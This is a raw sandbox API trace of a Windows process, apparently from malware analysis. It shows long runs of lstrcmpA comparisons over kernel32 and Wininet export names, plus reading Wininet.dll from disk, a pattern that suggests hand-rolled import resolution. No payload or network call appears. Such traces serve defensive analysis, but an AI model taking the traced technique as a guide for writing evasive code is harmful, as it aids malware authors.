1 [0218.737] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0218.737] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0218.737] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0218.738] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0218.738] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0218.738] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0218.739] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0218.739] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0218.739] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.739] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0218.739] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0218.739] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0218.740] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0218.740] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0218.741] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0218.741] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0218.741] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0218.742] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0218.742] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0218.742] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0218.742] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0218.742] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0218.742] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0218.742] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0218.743] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0218.743] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0218.744] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0218.744] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0218.745] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0218.746] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0220.400] GetProcessHeap () returned 0x480000 [0220.400] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4acc90 | out: hHeap=0x480000) returned 1 [0220.884] GetProcessHeap () returned 0x480000 [0220.884] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4997a0 [0220.884] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0220.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0220.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0220.894] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0220.894] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0220.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0220.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0220.894] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0220.894] GetProcessHeap () returned 0x480000 [0220.894] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x286600) returned 0x410c040 [0220.902] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0220.902] ReadFile (in: hFile=0x140, lpBuffer=0x410c040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410c040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0221.608] CloseHandle (hObject=0x140) returned 1 [0221.609] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0221.609] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0221.609] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0221.609] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0221.609] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0221.609] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 